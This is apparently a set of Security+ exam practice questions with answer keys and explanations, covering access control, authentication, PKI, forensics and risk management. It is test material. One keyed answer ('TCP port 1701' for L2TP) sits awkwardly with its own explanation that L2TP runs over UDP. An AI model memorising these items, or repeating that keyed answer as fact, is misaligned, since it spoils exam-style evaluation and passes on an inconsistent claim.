All of the following are considered elements of a password policy EXCEPT: A.Password sharing B.Password history C.Password aging D.Password complexity
A. Password sharing Correct Answer: Password sharing typically will be in the acceptable use policy (AUP), as a directive to users about what they can and cannot do. Incorrect Answers: Password history, aging, and complexity will all typically be found in a password policy, as technical elements that describe how passwords should be constructed, implemented, and managed by administrators.
Jeff is a user on the network and needs to be able to change the system time. Instead of adding Jeff to the Administrators group, you give Jeff the "Change the system time" right. What security principle are you following in this example? A.Least privilege B.Discretionary access control C.Role-based access control D.Separation of duties
A.Least privilege The principle of least privilege allows users to have only the privileges necessary to perform their duties and no more. Incorrect Answers: D.Separation of duties requires critical roles to be split among personnel so no one user has the privileges to commit fraud or to abuse his or her role. B&C.Role-based access control and discretionary access control are access control models.
Which of the following ports would be most likely to allow secure remote access into a system within a data center? A.TCP port 1701 B.UDP port 53 C.UDP port 123 D.TCP port 443
A.TCP port 1701 L2TP is registered on port 1701 (in practice it runs over UDP) and provides remote access through a VPN connection. L2TP alone does not encrypt, so secure remote access means L2TP/IPsec, which additionally requires UDP 500, UDP 4500 and ESP (IP protocol 50) to be permitted. Incorrect Answers: B.UDP port 53 is the Domain Name System (DNS). C.UDP port 123 is used by Network Time Protocol (NTP). D.TCP port 443 is HTTP over SSL/TLS.
Which of the following terms is defined as something that can cause harm to an asset? A.Threat B.Risk C.Vulnerability D.Loss
A.Threat A threat is an entity or event with the potential to cause harm or damage to an asset; if it materializes, the organization suffers a loss. Incorrect Answers: B.Risk is the likelihood that a threat exploits a vulnerability, combined with the resulting impact. C.A vulnerability is a weakness in a system that a threat can exploit. D.A loss is the damage that occurs when a vulnerability is exploited by a threat.
Your manager is interested in implementing a strong authentication scheme. Which of the following is considered the strongest authentication? A.Fingerprint B.Iris scan C.Username/password D.PIN
B.Iris scan Of the choices given, an iris scan is the strongest method of authentication, as iris patterns are highly distinctive to individuals. Of the common biometric methods, including voiceprint and fingerprints, iris scans are the most accurate. Incorrect Answers: C.Username and password combinations are not considered strong authentication, nor is a PIN by itself (D); both are single-factor, knowledge-based methods. A.Fingerprints are not considered as strong a biometric method as iris scans.
Which authentication protocol uses Microsoft Point-to-Point Encryption (MPPE) protocol to encrypt all traffic from the client to the server? A.Kerberos B.MS-CHAP C.EAP D.CHAP
B.MS-CHAP Microsoft CHAP (MS-CHAP) uses the Microsoft Point-to-Point Encryption (MPPE) protocol to encrypt all traffic from the client to the server, deriving the MPPE keys from the MS-CHAP exchange. (Both MS-CHAP versions have well-known weaknesses and should only be used inside a protected tunnel such as PEAP.) Incorrect Answers: A&C.Neither EAP nor Kerberos uses MPPE. D.CHAP is the nonproprietary version and uses MD5 as its hashing algorithm.
Ashlyn, the senior security officer within your organization, has requested that you create a plan for an active security test that tries to bypass the security controls of an asset. What type of test would you plan? A.Risk assessment B.Penetration test C.Vulnerability scan D.Code review
B.Penetration test A penetration test is considered an active test because you actually interact with the target system and try to bypass its security controls. Incorrect Answers: C.A vulnerability scan is considered a passive test in this context because it only reviews a system's configuration and software versions for known weaknesses without attempting to exploit them. A.A risk assessment helps identify risks for each asset. D.A code review involves reviewing the source code of an application to look for flaws.
You wish to send an encrypted message to Bob. Which of the following is used to encrypt a message sent to Bob in a PKI environment? A.Hash value B.Public key C.Symmetric key D.Private key
B.Public key Bob's public key is used to encrypt a message for him. Bob then decrypts the message with his private key, which only he holds. Incorrect Answers: C.Symmetric keys and hashes are not used on their own to encrypt a message to an individual in a PKI environment (in practice the public key encrypts a per-message symmetric key, which in turn encrypts the bulk data). D.The private key would be used to decrypt, not encrypt, the message in this scenario.
Which of the following is the most volatile source of evidence and should be collected first during a computer forensics investigation? A.CD/DVDs B.RAM C.Hard disks D.Swap file
B.RAM RAM is the most volatile source of evidence listed: its contents are lost when the system is powered off, so it must be collected first. Incorrect Answers: The order of volatility, and therefore the order of collection, runs from most to least volatile: RAM, swap file, hard disk, then CD/DVDs.
What type of file, often sent with an e-mail message, can contain malicious code that can be downloaded and executed on a client's computer? A.Cross-site script B.Locally shared object C.HTML attachment D.Cookie
C.HTML attachment Any form of attachment is a risk. An HTML attachment is an HTML file that arrives attached to an e-mail message; when a user opens it, it renders in the browser, where embedded script can run and the page can connect to a malicious web site from which further malicious code is downloaded. Incorrect Answers: Cookies, locally shared objects and cross-site scripts are not sent as e-mail attachments.
All of the following are valid 5.0 Risk Management strategies EXCEPT: A.Risk acceptance B.Risk mitigation C.Risk elimination D.Risk transference
C.Risk elimination Risk can never be completely eliminated, only accepted, mitigated, transferred or avoided. Incorrect Answers: The other three are all valid risk response strategies from domain 5.0 (Risk Management) of the SY0-501 objectives.